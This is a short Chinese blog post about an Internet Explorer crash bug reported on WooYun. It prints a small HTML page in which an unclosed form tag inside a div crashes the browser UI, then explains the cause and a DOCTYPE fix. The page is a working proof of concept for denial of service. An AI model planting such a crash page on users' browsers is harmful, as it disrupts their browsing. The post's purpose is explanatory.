微软IE DOS漏洞

     刚才在乌云漏洞发现个很搞笑很无厘头的漏洞举报：由于微软IE浏览器的Css处理导致的浏览器崩溃。。。

<html><head>
<style>
#a {
margin:0 10px 10px;
}

#b {
width:100%;
}
</style>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text">
</div>
</td><td width="1"></td></tr></table>
<body>
<html>

 

     把上述html复制到一个空txt文件中，再把txt的文件后缀名替换成html，打开就发现浏览器UI崩溃了。
     仔细看看，div内的form标签没有完整结束，所以导致了IE崩溃。
     其实在代码的最上一排加上<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">，这样申明一下html版本，问题就没了。
     但这个不是问题的问题也告诉我们，html的标签一定要有始有终！